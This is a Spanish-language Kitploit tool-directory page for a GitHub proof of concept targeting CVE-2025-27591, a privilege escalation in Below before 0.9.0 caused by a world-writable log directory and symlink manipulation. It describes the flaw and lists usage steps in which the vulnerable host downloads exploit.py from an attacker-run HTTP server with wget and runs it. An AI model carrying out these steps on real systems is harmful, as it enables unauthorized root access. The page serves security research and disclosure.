Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-27591-PoC — CVE-2025-27591 es una vulnerabilidad de escalada de privilegios que afectó al servicio Below antes de la versión 0.9.0 | Kitploit
Herramientas/GitHubGitHub/bridgeralderson/cve-2025-27591-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y Educación
GitHubbridgeralderson/cve-2025-27591-poc

CVE-2025-27591-PoC

CVE-2025-27591 es una vulnerabilidad de escalada de privilegios que afectó al servicio Below antes de la versión 0.9.0

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
3221hace 1 añoRevisado por Kitploit

CVE-2025-27591 Prueba de Concepto

CVE-2025-27591 es una vulnerabilidad de escalada de privilegios que afectó al servicio Below antes de la versión 0.9.0. El problema surgió debido a la creación de un directorio con permisos de escritura mundial en /var/log/below. Un atacante podría explotar esta vulnerabilidad manipulando enlaces simbólicos dentro de este directorio y potencialmente obtener privilegios de root, lo que la convierte en una preocupación de seguridad significativa para usuarios locales sin privilegios.

Esta prueba de concepto fue escrita únicamente con fines educativos y de investigación.

Al momento de redactar esto, no existía una PoC disponible públicamente para esta vulnerabilidad en la comunidad. Por lo tanto, decidí compartir responsablemente esta implementación para llenar ese vacío, contribuir al ecosistema de investigación de seguridad y concienciar sobre la naturaleza crítica de un sistema de archivos inseguro.

Causa de la Vulnerabilidad

imagen

Prueba de Concepto

Desde la máquina atacante:

1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git

2-cd CVE-2025-27591-PoC

3-python3 -m http.server 80

Desde el sistema vulnerable:

1- wget http:///exploit.py

2-python exploit.py

imagen

Referencias

https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3

Descargar herramienta